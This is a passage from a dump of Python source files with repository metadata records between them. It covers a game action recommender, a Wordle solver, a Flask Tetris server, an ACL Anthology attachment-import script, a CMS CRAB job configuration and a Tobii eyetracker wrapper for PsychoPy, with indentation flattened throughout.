path = '../data/models/' + features_classification + '/' + model_name + '/' + target_name
# print(path)
return path
def classification_models():
if __classification_metamodels__[0] is not None:
return __classification_metamodels__[0]
print('loading models')
classification_metamodels = {}
for features_classification in cfg.features_classes:
for target_name in cfg.onehot_targets:
mm = models.load(model_path(features_classification, target_name))
key = make_key(features_classification, target_name)
classification_metamodels[key] = mm
__classification_metamodels__[0] = classification_metamodels
return __classification_metamodels__[0]
def select_classification_metamodel(features_classification, target_name):
key = make_key(features_classification, target_name)
return classification_models()[key]
def test_select_classification_metamodel():
for features_class in cfg.features_classes:
for target in cfg.onehot_targets:
mdl = select_classification_metamodel(features_class, target)
print('features_class: {}, target: {}, model: {}'.format(features_class, target, mdl.name))
def model(feat_class_filt, target_name):
return select_classification_metamodel(feat_class_filt, target_name).model
def randomized_actions():
indices = random.sample(range(1, num_actions + 1), num_actions)
for idx in indices:
yield idx
def create_features_test_dataset(feat_class_filt, feat, target_name):
csv_data = features.header()
record = extractor.extract(feat_class_filt, feat)
if record is None:
raise RuntimeError("no feature converter for features_class: {}".format(feat_class_filt))
test_features = []
for action in randomized_actions():
test_feature = copy.copy(record)
test_feature.action = action
test_features.append(test_feature)
csv_data += '\n'
csv_data += features.to_string(test_feature)
data_fp = io.StringIO(csv_data)
ds = datasets.from_csv(data_fp, cfg.onehot_targets, target_name)
return ds, test_features
def predict(obs, feat_class_filt, target_name):
pure_pure = features.observation_to_features(obs)
if pure_pure is None:
raise RuntimeError("failed to convert observation to features")
ds, test_features = create_features_test_dataset(feat_class_filt, pure_pure, target_name)
mdl = model(feat_class_filt, target_name)
predictions = mdl.predict(ds.data)
return predictions, ds.data, test_features
def random_recommendation(obs):
action = random.randint(1, 5)
obs.action = action
return obs
def randomize_predictions(predictions):
np = len(predictions)
indices = random.sample(range(1, np + 1), np)
for idx in indices:
yield predictions[idx]
def min_max(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
lowest = 99999
highest = -1
for idx, p in enumerate(predictions):
if p < lowest:
lowest = p
min_feat = test_features[idx]
if p > highest:
highest = p
max_feat = test_features[idx]
return lowest, min_feat, highest, max_feat
def xminimise(obs, feat_class_filt, target_name):
lowest, min_feat, highest, max_feat = min_max(obs, feat_class_filt, target_name)
obs.action = min_feat.action
print("minimise {} recommendation: {} ({})".format(target_name, obs.action, lowest))
print("{}/{})".format(predictions, features.to_string(feat)))
return lowest, highest
def minimise(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
lowest = 99999
for idx, p in enumerate(predictions):
if p < lowest:
lowest = p
feat = test_features[idx]
obs.action = feat.action
# print("minimise {} recommendation: {} ({})".format(target_name, obs.action, lowest))
# print("{}/{})".format(predictions, features.to_string(feat)))
return lowest
def maximise(obs, feat_class_filt, target_name):
predictions, _, test_features = predict(obs, feat_class_filt, target_name)
highest = -1
for idx, p in enumerate(predictions):
if p > highest:
highest = p
feat = test_features[idx]
obs.action = feat.action
# print("maximise {} recommendation: {} ({})".format(target_name, obs.action, highest))
# print("{}/{})".format(predictions, features.to_string(feat)))
return highest
def minimise_enemy_collisions(obs):
return minimise(obs, 'scaled_pure', 'enemy_collisions')
def minimise_wall_collisions(obs):
return minimise(obs, 'scaled_pure', 'wall_collisions')
def minimise_shell_wounds(obs):
return minimise(obs, 'scaled_pure', 'shell_wounds')
def maximise_shell_intercepts(obs):
return maximise(obs, 'scaled_pure', 'shell_intercepts')
def maximise_shell_hits(obs):
return maximise(obs, 'scaled_pure', 'shell_hits')
def recommend(obs):
lowest = minimise_wall_collisions(obs)
return lowest
def test_recommendations_from_observations():
obs_fp = cfg.ensure_fp(cfg.observations_root, cfg.observations)
print("recommending from: {}".format(obs_fp))
obs_list = util.csv_to_json(obs_fp)
print('-------------------- PREDICTIONS --------------------')
for idx, jsn in enumerate(obs_list):
obs = observations.json_to_observation(jsn)
for feat_class_filt in cfg.features_classes:
for target in cfg.onehot_targets:
predictions, _, test_features = predict(obs, feat_class_filt, target)
found = False
n = predictions[0]
for t in predictions:
if found:
continue
if n != t:
print("{}: target={}, feat_class_filt={}, predictions={}".format(
idx, target, feat_class_filt, predictions))
for f in test_features:
print(features.to_string(f))
found = True
continue
def test_recommenders():
obs_fp = cfg.ensure_fp(cfg.observations_root, cfg.observations)
print("recommending from: {}".format(obs_fp))
obs_list = util.csv_to_json(obs_fp)
print('-------------------- RECOMMENDATIONS --------------------')
for idx, jsn in enumerate(obs_list):
print('observation: {}'.format(idx))
obs = observations.json_to_observation(jsn)
minimise_enemy_collisions(obs)
minimise_wall_collisions(obs)
minimise_shell_wounds(obs)
maximise_shell_intercepts(obs)
maximise_shell_hits(obs)
def test_randomized_actions():
for _ in range(10000):
for idx in randomized_actions():
if idx < 1 or idx > num_actions:
raise RuntimeError('randomized_actions: {}'.format(idx))
print('randomized_actions passed')
def main():
test_randomized_actions()
test_recommenders()
# test_recommendations_from_observations()
if __name__ == "__main__":
main()
| 30.46875
| 103
| 0.673205
|
e918f242dfe8182e33a9f179d04d1048689b8118
| 2,062
|
py
|
Python
|
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
solve_state.py
|
imVincentTan/wordle-solver
|
b57d5ec9d2d6426d05449b9230a08405040b4b19
|
[
"MIT"
] | null | null | null |
from math import log2
from hints_calculator import HintsCalculator
from tools import Tools
class SolveState(Tools):
def __init__(self, possible_letters, number_of_characters, valid_words) -> None:
self.possible_letters = possible_letters
self.number_of_characters = number_of_characters
self.valid_input_words = valid_words
self.possible_final_answers = valid_words
def get_submission_hints(self, input_word, target_word):
hints_calculator = HintsCalculator(input_word, target_word)
return hints_calculator.get_hints()
def get_sorted_word_to_expected_score(self):
# TODO: improve algorithm to be faster
word_score_pairs = []
for input_word in self.valid_input_words:
word_score_pairs.append([input_word, self.get_expected_score(input_word)])
word_score_pairs.sort(key=lambda x: x[1], reverse=True)
return word_score_pairs
def get_expected_score(self, input_word):
hint_pattern_to_frequency_map = self.get_hint_pattern_to_frequency_map(input_word)
score = 0
for key in hint_pattern_to_frequency_map:
score += self.get_score_gained_by_occurrences(hint_pattern_to_frequency_map[key])
return score
def get_score_gained_by_occurrences(self, occurrences):
probability_of_hint = occurrences / self.get_number_of_valid_inputs()
weight = log2(1/probability_of_hint)
return probability_of_hint * weight
def get_number_of_valid_inputs(self):
return len(self.valid_input_words)
def get_hint_pattern_to_frequency_map(self, input_word):
hint_pattern_to_frequency_map = {}
for target_word in self.valid_input_words:
hint_pattern = self.get_submission_hints(input_word, target_word)
if hint_pattern in hint_pattern_to_frequency_map:
hint_pattern_to_frequency_map[hint_pattern] += 1
else:
hint_pattern_to_frequency_map[hint_pattern] = 1
return hint_pattern_to_frequency_map
| 41.24
| 93
| 0.730844
|
7bae862657f38a00a09cbf95a98e2e374da89758
| 4,169
|
py
|
Python
|
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | 9
|
2018-04-06T23:10:59.000Z
|
2022-01-21T01:04:51.000Z
|
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | null | null | null |
tetris-server/app.py
|
OrhanKupusoglu/docker-tetris
|
42f70431e686264f8dd66e7d419674b7271a66e6
|
[
"MIT"
] | 5
|
2019-09-18T22:04:35.000Z
|
2022-01-04T20:27:37.000Z
|
"""
Tetris Server
Flask:
http://flask.pocoo.org/
Tetris:
https://github.com/ytiurin/tetris
"""
import os
import uuid
import time
import logging
import logging.handlers
import json
from flask import (
abort,
Flask,
request,
Response,
session,
g,
jsonify,
redirect,
url_for,
abort,
render_template,
flash,
)
# APP
app = Flask(__name__, static_folder='static', static_url_path='')
app.config.update(dict(
SECRET_KEY = str(uuid.uuid4()),
LOG_ENABLED = True,
LOG_LEVEL = 'INFO',
LOG_FILE = 'tetris-server/static/log/server.txt',
LOG_MAX_BYTES = 1024 * 1024,
LOG_BACKUP_COUNT = 10,
SHUTDOWN_IF_LOCALHOST_ONLY = True
))
app.config.from_envvar('TETRIS_SERVER_SETTINGS', silent=True)
# LOGGER
if app.config['LOG_ENABLED']:
logHandler = logging.handlers.RotatingFileHandler(app.config['LOG_FILE'],
maxBytes=app.config['LOG_MAX_BYTES'],
backupCount=app.config['LOG_BACKUP_COUNT'])
logHandler.setFormatter(logging.Formatter("[%(asctime)s] %(levelname)s - %(message)s"))
if app.config['LOG_LEVEL'] == 'DEBUG':
app.logger.setLevel(logging.DEBUG)
elif app.config['LOG_LEVEL'] == 'INFO':
app.logger.setLevel(logging.INFO)
elif app.config['LOG_LEVEL'] == 'WARNING':
app.logger.setLevel(logging.WARNING)
elif app.config['LOG_LEVEL'] == 'ERROR':
app.logger.setLevel(logging.ERROR)
elif app.config['LOG_LEVEL'] == 'CRITICAL':
app.logger.setLevel(logging.CRITICAL)
app.logger.addHandler(logHandler)
logging.getLogger('werkzeug').addHandler(logHandler)
with open(app.config['LOG_FILE'], 'a') as log_file:
log_file.write('\n' + 80*'-' + '\n\n')
else:
app.logger.disabled = True
logging.getLogger('werkzeug').disabled = True
app.logger.info('Application started')
# HELPER FUNCTIONS
def is_localhost():
remote_addr = request.environ['REMOTE_ADDR']
app.logger.info('request - remote addr = {}'.format(remote_addr))
return remote_addr == '127.0.0.1' or remote_addr == '::1'
def shutdown_server():
func = request.environ.get('werkzeug.server.shutdown')
if func is None:
raise RuntimeError('not running with the Werkzeug Server')
func()
# ROUTES
@app.route('/')
def show_root():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return redirect(url_for('show_game'))
@app.route('/tetris')
def show_game():
return redirect(url_for('get_game', file='index.html'))
@app.route('/tetris/<path:file>')
def get_game(file):
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return app.send_static_file('tetris/' + file)
@app.route('/log')
def show_log():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
return app.send_static_file('log/server.txt')
@app.route('/shutdown', methods=['POST'])
def shutdown():
app.logger.info('URL: {} - client: {}\n\t{}'.format(request.url, request.remote_addr, request.headers.get('User-Agent')))
if app.config['SHUTDOWN_IF_LOCALHOST_ONLY']:
if not is_localhost():
abort(401)
shutdown_server()
return 'Service shutting down...'
# ERRORS
@app.errorhandler(401)
def unauthorized(error=None):
message = {'status': 401,
'message': 'Unauthorized',
'url': request.url}
resp = jsonify(message)
resp.status_code = 401
return resp
@app.errorhandler(404)
def not_found(error=None):
message = {'status': 404,
'message': 'Not Found',
'url': request.url}
resp = jsonify(message)
resp.status_code = 404
return resp
@app.errorhandler(500)
def not_found(error=None):
message = {'status': 500,
'message': 'Internal Server Error',
'url': request.url}
resp = jsonify(message)
resp.status_code = 500
return resp
| 27.427632
| 125
| 0.637083
|
1390237717c3ef8fd76398e6ce5c5dea7908a60b
| 9,790
|
py
|
Python
|
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
bin/add_attachments.py
|
mardub1635/acl-anthology
|
448c9d8919736c7493e57af505dfb06cf11dc43a
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Copyright 2019 Matt Post <post@cs.jhu.edu>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Used to add attachments to the Anthology.
Usage:
add_attachments.py CSV_FILE
Where CSV_FILE is output from the Microsoft form (https://forms.office.com/Pages/ResponsePage.aspx?id=DQSIkWdsW0yxEjajBLZtrQAAAAAAAAAAAAMAABqTSThUN0I2VEdZMTk4Sks3S042MVkxUEZQUVdOUS4u) we use to collect attachments, and has the following headers:
ID,Start time,Completion time,Email,Name,Anthology ID,URL where we can download the attachment,Attachment type,"For corrections or errata, please explain in detailed prose what has changed.",Your name,Your email address,I agree to the Anthology's CC-BY-4.0 distribution license.
Downloads the files, edits the XML, and dumps a log to
add_attachments.log, along with emails to be sent to those whose
imports failed.
"""
import argparse
import csv
import filetype
import os
import shutil
import ssl
import sys
import tempfile
from anthology.utils import build_anthology_id, deconstruct_anthology_id, indent
import lxml.etree as ET
import urllib.request
ALLOWED_TYPES = ["pdf", "pptx", "zip"]
ATTACHMENT_TYPES = "Poster Presentation Note Software Supplementary Dataset".split()
def add_attachment(anthology_id, path, attach_type, overwrite=False):
"""
Adds a single attachment to the Anthology data files.
Arguments:
- The ACL ID of the paper (e.g., P17-1012)
- The path to the attachment (can be a URL)
- The attachment type (poster, presentation, note, software)
- Whether to overwrite the downloaded file.
"""
collection_id, volume_id, paper_id = deconstruct_anthology_id(anthology_id)
if path.startswith("http"):
_, input_file_path = tempfile.mkstemp()
try:
print(
f"-> Downloading file from {path} to {input_file_path}", file=sys.stderr
)
request = urllib.request.Request(path, headers={'User-Agent': 'Mozilla/5.0'})
with urllib.request.urlopen(request) as url, open(
input_file_path, mode="wb"
) as input_file_fh:
input_file_fh.write(url.read())
except ssl.SSLError:
raise Exception(f"Could not download {path}")
except Exception as e:
raise e
else:
input_file_path = path
file_extension = path.replace("?dl=1", "").split(".")[-1]
# Many links from file sharing services are not informative and don't have
# extensions, so we could try to guess.
if file_extension not in ALLOWED_TYPES:
detected = filetype.guess(input_file_path)
if detected is not None:
file_extension = detected.mime.split("/")[-1]
if file_extension not in ALLOWED_TYPES:
print(
f"Could not determine file extension for {anthology_id} at {path}",
file=sys.stderr,
)
# Update XML
xml_file = os.path.join(
os.path.dirname(sys.argv[0]), "..", "data", "xml", f"{collection_id}.xml"
)
tree = ET.parse(xml_file)
attachment_file_name = f"{anthology_id}.{attach_type}.{file_extension}"
paper = tree.getroot().find(f"./volume[@id='{volume_id}']/paper[@id='{paper_id}']")
if paper is not None:
# Check if attachment already exists
for attachment in paper.findall("attachment"):
if attachment.text == attachment_file_name:
print(
f"-> attachment {attachment_file_name} already exists in the XML",
file=sys.stderr,
)
break
else:
attachment = ET.Element("attachment")
attachment.attrib["type"] = attach_type.lower()
attachment.text = attachment_file_name
paper.append(attachment)
indent(tree.getroot())
tree.write(xml_file, encoding="UTF-8", xml_declaration=True)
print(
f"-> added attachment {attachment_file_name} to the XML", file=sys.stderr
)
else:
print(f"Paper {anthology_id} not found in the Anthology", file=sys.stderr)
# Make sure directory exists
output_dir = os.path.join(args.attachment_root, collection_id[0], collection_id)
if not os.path.exists(output_dir):
# print(f"-> Creating directory {output_dir}", file=sys.stderr)
os.makedirs(output_dir)
# Copy file
dest_path = os.path.join(output_dir, attachment_file_name)
if os.path.exists(dest_path) and not overwrite:
print(
f"-> target file {dest_path} already in place, refusing to overwrite",
file=sys.stderr,
)
return None
shutil.copy(input_file_path, dest_path)
os.chmod(dest_path, 0o644)
print(f"-> copied {input_file_path} to {dest_path} and fixed perms", file=sys.stderr)
# Clean up
if path.startswith("http"):
os.remove(input_file_path)
return dest_path
def main(args):
attachments = {}
with open(args.csv_file) as csv_file:
for row in csv.DictReader(csv_file):
# ID,Start time,Completion time,Email,Name,Anthology ID,URL where we can download the attachment,Attachment type,"For corrections or errata, please explain in detailed prose what has changed.",Your name,Your email address,I agree to the Anthology's CC-BY-4.0 distribution license
anthology_id = row["Anthology ID"].strip()
download_path = row["URL"]
attachment_type = row["Attachment type"]
submitter_name = row["Your name"]
submitter_email = row["Your email address"]
submitted = row["Completion time"]
if attachment_type not in ATTACHMENT_TYPES:
print(
f"{anthology_id}: Skipping unknown type {attachment_type}: {download_path}",
file=sys.stderr,
)
continue
if anthology_id in attachments:
print(
f"{anthology_id}: Received multiple entries, only processing the last one ({attachment_type}): {download_path}",
file=sys.stderr,
)
attachments[anthology_id] = (
download_path,
attachment_type,
submitter_name,
submitter_email,
submitted,
)
succeeded = 0
failed = 0
with open(args.logfile, "a") as log:
for anthology_id, (path, attach_type, name, email, date) in attachments.items():
try:
print(f"Processing attachment for {anthology_id}", file=sys.stderr)
success = add_attachment(
anthology_id, path, attach_type, overwrite=args.overwrite
)
if success:
succeeded += 1
print(f"{anthology_id}: SUCCESS.", file=log)
else:
print(f"{anthology_id}: ALREADY DONE (use -o to redo).", file=log)
except Exception as reason:
failed += 1
print(f"{anthology_id}: FAILURE", file=log)
with open(f"{args.logfile}.{anthology_id}.txt", "w") as email_log:
print(
f"{email}\n"
f"ACL Anthology: failed to add attachment for {anthology_id}\n"
f"Dear {name},\n"
f"\n"
f"On {date} you submitted the following attachment to the ACL Anthology\n"
f"\n"
f" paper ID: {anthology_id}\n"
f" link: {path}\n"
f"\n"
f"Adding this attachment failed. The reason reported was:\n"
f"\n"
f" {reason}\n"
f"\n"
f"To resubmit, follow the instructions here:\n"
f"\n"
f" https://www.aclweb.org/anthology/info/corrections/\n",
f"\n"
f"There is no need to respond to this email.\n"
f"\n"
f"Sincerely,\n"
f"Matt Post\n"
f"Anthology Director\n",
file=email_log,
)
print(
f"Processed {len(attachments)} attachments ({succeeded} succeeded, {failed} failed)."
)
print(f"Wrote logfile to {args.logfile}.")
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("csv_file", help="The CSV file from the Microsoft form")
parser.add_argument(
"--overwrite", "-o", action="store_true", help="Overwrite attachments"
)
parser.add_argument(
"--logfile", "-l", default="add_attachments.log", help="Logfile to write to"
)
parser.add_argument(
"--attachment-root",
"-d",
default=os.path.join(os.environ["HOME"], "anthology-files/attachments"),
help="Anthology web directory root.",
)
args = parser.parse_args()
main(args)
| 38.543307
| 291
| 0.594382
|
b4af888c05052c270fcf9a0f7a3024ae77bb61fa
| 1,627
|
py
|
Python
|
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | 1
|
2022-01-17T17:29:38.000Z
|
2022-01-17T17:29:38.000Z
|
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | null | null | null |
Kai/crab/NANOv7_NoveCampaign/2018/crab_cfg_2018_tt_DL-GF.py
|
NJManganelli/FourTopNAOD
|
9743d5b49bdbad27a74abb7b2d5b7295f678a0e3
|
[
"Apache-2.0"
] | 1
|
2021-12-15T10:56:50.000Z
|
2021-12-15T10:56:50.000Z
|
import os
from WMCore.Configuration import Configuration
from CRABClient.UserUtilities import config, getUsernameFromCRIC
config = Configuration()
config.section_("General")
config.General.requestName = '2018_tt_DL-GF'
config.General.transferOutputs = True
config.General.transferLogs = True
config.section_("JobType")
config.JobType.allowUndistributedCMSSW = True
config.JobType.pluginName = 'Analysis'
config.JobType.psetName = 'crab_PSet_2018_tt_DL-GF.py'
config.JobType.maxMemoryMB = 3000
config.JobType.maxJobRuntimeMin = 1315
config.JobType.numCores = 1
config.JobType.scriptExe = 'crab_script_2018_tt_DL-GF.sh'
config.JobType.inputFiles = ['crab_script_2018_tt_DL-GF.py',
os.path.join(os.environ['CMSSW_BASE'],'src/PhysicsTools/NanoAODTools/scripts/haddnano.py'),
]
config.JobType.outputFiles = [] #['hist.root']
config.JobType.sendPythonFolder = True
config.section_("Data")
config.Data.inputDataset = '/TTTo2L2Nu_HT500Njet7_TuneCP5_13TeV-powheg-pythia8/RunIIAutumn18NanoAODv7-Nano02Apr2020_102X_upgrade2018_realistic_v21-v1/NANOAODSIM'
config.Data.inputDBS = 'global'
config.Data.splitting = 'FileBased'
if config.Data.splitting == 'FileBased':
config.Data.unitsPerJob = 1
# config.Data.totalUnits = $TOTAL_UNITS
# config.Data.userInputFiles = []
# config.Data.outLFNDirBase = '/store/user/{user}/NoveCampaign'.format(user=getUsernameFromCRIC())
config.Data.outLFNDirBase = '/store/group/fourtop/NoveCampaign'
config.Data.publication = True
config.Data.outputDatasetTag = 'NoveCampaign'
config.section_("Site")
config.Site.storageSite = 'T2_BE_IIHE'
| 40.675
| 161
| 0.777505
|
3afc862a4da7214a8d147df8ed03e28da80b06e7
| 60,851
|
py
|
Python
|
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
tobii_pro_wrapper/tobii_pro_wrapper.py
|
anthonycrane/tobii_pro_wrapper
|
65292966f2b3a9ec9bef0382878a397406ec974d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Psychopy supported Tobii controller for the new Pro SDK
# Authors: Olivia Guayasamin
# Date: 8/3/2017
# Requirements: Python 2.7 32 Bit (SDK required)
# Tobii Pro SDK 1.0 for Python, and all dependencies
# Psychopy, Psychopy.iohub, and all dependencies
# numpy, scipy, and win32api
# Summary: Currently provides all functionality for running a FULL CALIBRATION
# ROUTINE for 5 and 9 point calibrations, and converting between Tobii
# Trackbox, Tobii ADA, and Psychopy coordinate systems.
# This code also contains functionality for finding/calibrating the
# experimental monitor, connecting to keyboard/mouse devices, selecting and
# connecting to a tobii device, getting tobii device parameters, and getting
# real time gaze and eye position data from the tobii tracker.
# Notes: This code is currently designed for working with a tobii eyetracker
# installed on the same device as the one for running experiments (laptop set-
# up with a single connected eyetracker, no external monitors, and no tobii
# external processors). It should be straightforward to adapt to other
# computer/monitor set-ups, but adaptation is required. Created on Windows OS.
# Not guaranteed.
# Please contact for questions. This will be updated as more functionality is
# added.
# -----Import Required Libraries-----
import pyglet
from psychopy import core as pcore
from psychopy import monitors, visual, gui, data, event
from psychopy.iohub import launchHubServer
import datetime as dt
import numpy as np
from scipy.spatial import distance
import tobii_research as tobii
import collections
# -----Class for working with Tobii Eyetrackers -----
class TobiiHelper:
def __init__(self):
self.eyetracker = None
self.adaCoordinates = {}
self.tbCoordinates = {}
self.calibration = None
self.tracking = False
self.win = None
self.gazeData = {}
self.syncData = {}
self.currentOutData = {}
# ----- Functions for initialzing the eyetracker and class attributes -----
# find and connect to a tobii eyetracker
def findTracker(self, serialString = None):
# try to find all eyetrackers
allTrackers = tobii.find_all_eyetrackers()
# if there are no eyetrackers
if len(allTrackers) < 1:
raise ValueError("Cannot find any eyetrackers.")
# if there is no serialString specified, use first found eyetracker
if serialString is None:
# use first found eyetracker
eyetracker = allTrackers[0]
address = eyetracker.address
print("Address: " + eyetracker.address)
print("Model: " + eyetracker.model)
print("Name: " + eyetracker.device_name)
print("Serial number: " + eyetracker.serial_number)
# create eyetracker object
self.eyetracker = tobii.EyeTracker(address)
# if serial number is not given as a string
elif not isinstance(serialString, basestring):
raise TypeError("Serial number must be formatted as a string.")
# if serial number is given as a string
else:
# get information about available eyetrackers
for eyetracker in allTrackers:
if eyetracker.serial_number == serialString:
address = eyetracker.address
print("Address: " + eyetracker.address)
print("Model: " + eyetracker.model)
# fine if name is empty
print("Name: " + eyetracker.device_name)
print("Serial number: " + eyetracker.serial_number)
# create eyetracker object
self.eyetracker = tobii.EyeTracker(address)
# check to see that eyetracker is connected
if self.eyetracker is None:
print("Eyetracker did not connect. Check serial number?")
else:
print("Eyetracker connected successfully.")
# function for getting trackbox (tb) and active display area (ada)coordinates, returns
# coordintes in two separate dictionaries with values in mm
def getTrackerSpace(self):
# check to see that eyetracker is connected
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# get active display area information in mm as a dictionary
displayArea = self.eyetracker.get_display_area()
self.adaCoordinates['bottomLeft'] = displayArea.bottom_left
self.adaCoordinates['bottomRight'] = displayArea.bottom_right
self.adaCoordinates['topLeft'] = displayArea.top_left
self.adaCoordinates['topRight'] = displayArea.top_right
self.adaCoordinates['height'] = displayArea.height
self.adaCoordinates['width'] = displayArea.width
# get track box information in mm, return only the 2d coordinates
# of the cube side closest to the eyetracker
trackBox = self.eyetracker.get_track_box()
self.tbCoordinates['bottomLeft'] = trackBox.front_lower_left
self.tbCoordinates['bottomRight'] = trackBox.front_lower_right
self.tbCoordinates['topLeft'] = trackBox.front_upper_left
self.tbCoordinates['topRight'] = trackBox.front_upper_right
# calculate box height and width
trackBoxHeight = np.absolute(trackBox.front_lower_left[1] -
trackBox.front_upper_right[1])
trackBoxWidth = np.absolute(trackBox.front_lower_left[0] -
trackBox.front_lower_right[0])
self.tbCoordinates['height'] = trackBoxHeight
self.tbCoordinates['width'] = trackBoxWidth
# define and calibrate experimental monitor, set monitor dimensions
def setMonitor(self, nameString = None, dimensions = None):
# find all connected monitors
allMonitors = monitors.getAllMonitors()
# if there are no eyetrackers
if len(allMonitors) < 1:
raise ValueError("Psychopy can't find any monitors.")
# if no dimensions given
if dimensions is None:
# use current screen dimensions
platform = pyglet.window.get_platform()
display = platform.get_default_display()
screen = display.get_default_screen()
dimensions = (screen.width, screen.height)
# if dimension not given as tuple
elif not isinstance(dimensions, tuple):
raise TypeError("Dimensions must be given as tuple.")
# if there is not monitor name defined, go to first default monitor
if nameString is None:
# create monitor calibration object
thisMon = monitors.Monitor(allMonitors[0])
print("Current monitor name is: " + allMonitors[0])
# set monitor dimensions
thisMon.setSizePix(dimensions)
# save monitor
thisMon.saveMon() # save monitor calibration
self.win = thisMon
# if serial number is not given as a string
elif not isinstance(nameString, basestring):
raise TypeError("Monitor name must be formatted as a string.")
# if serial number is given as a string
else:
# create monitor calibration object
thisMon = monitors.Monitor(nameString)
print("Current monitor name is: " + nameString)
# set monitor dimensions
thisMon.setSizePix(dimensions)
# save monitor
thisMon.saveMon() # save monitor calibration
self.win = thisMon
# ----- Functions for starting and stopping eyetracker data collection -----
# function for broadcasting real time gaze data
def gazeDataCallback(self,startGazeData):
self.gazeData = startGazeData
# function for subscribing to real time gaze data from eyetracker
def startGazeData(self):
# check to see if eyetracker is there
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# if it is, proceed
print("Subscribing to eyetracker.")
self.eyetracker.subscribe_to(tobii.EYETRACKER_GAZE_DATA,
self.gazeDataCallback,
as_dictionary = True)
self.tracking = True
# function for unsubscring from gaze data
def stopGazeData(self):
# check to see if eyetracker is there
if self.eyetracker is None:
raise ValueError("There is no eyetracker.")
# if it is, proceed
print("Unsubscribing from eyetracker")
self.eyetracker.unsubscribe_from(tobii.EYETRACKER_GAZE_DATA,
self.gazeDataCallback)
self.tracking = False
# ----- Helper functions -----
# function for checking tracker and computer synchronization
def timeSyncCallback(self, timeSyncData):
self.syncData = timeSyncData
# broadcast synchronization data
def startSyncData(self):
#check that eyetracker is connected
if self.eyetracker is None:
raise ValueError('Eyetracker is not connected.')
# if it is , proceed
print("Subscribing to time synchronization data")
self.eyetracker.subscribe_to(tobii.EYETRACKER_TIME_SYNCHRONIZATION_DATA,
self.timeSyncCallback,
as_dictionary=True)
# stop broadcasting synchronization data
def stopSyncData(self):
self.eyetracker.unsubscribe_from(tobii.EYETRACKER_TIME_SYNCHRONIZATION_DATA,
self.timeSyncCallback)
print("Unsubscribed from time synchronization data.")
# function for converting positions from trackbox coordinate system (mm) to
# normalized active display area coordinates
def tb2Ada(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) is not 2:
raise ValueError("Wrong number of coordinate dimensions")
# check tracker box and ada coordinates
if self.tbCoordinates is None or self.adaCoordinates is None:
raise ValueError("Missing trackbox coordinates. \n" +\
"Try running getTrackerSpace()")
# get tb and ada values from eyetracker
tbDict = self.tbCoordinates
tbLowLeft = (tbDict.get('bottomLeft')[0],
tbDict.get('bottomLeft')[1])
adaDict = self.adaCoordinates
adaLowLeft = ((adaDict.get('width')/-2),
(adaDict.get('height')/-2))
# create ratios for x and y coordinates
yRatio = tbLowLeft[1]/adaLowLeft[1]
xRatio = tbLowLeft[0]/adaLowLeft[0]
# convert and return coordinates
adaNorm = ((xyCoor[0] * xRatio), (xyCoor[1] * yRatio))
return adaNorm
# function for converting normalized coordinates to normalized coordinates
# based on the psychopy window
def tb2PsychoNorm(self, xyCoor = tuple):
# check argument values
if xyCoor is None:
raise ValueError("No coordinate values have been specified.")
elif not isinstance(xyCoor, tuple):
raise TypeError("XY coordinates must be given as tuple.")
elif isinstance(xyCoor, tuple) and len(xyCoor) is not 2:
raise ValueError("Wrong number of coordinate dimensions")
# convert track box coordinates to adac coordinates
adaCoors = self.tb2Ada(xyCoor)
# correct for psychopy window coordinates
centerScale = self.tb2Ada((1, 1))
centerShift = ((centerScale[0] / 2), (centerScale[1] / 2))
psychoNorm = (adaCoors[0] - centerShift[0],
adaCoors[1] - centerShift[1])
# return coordinates in psychowin 'norm' units
return psychoNorm
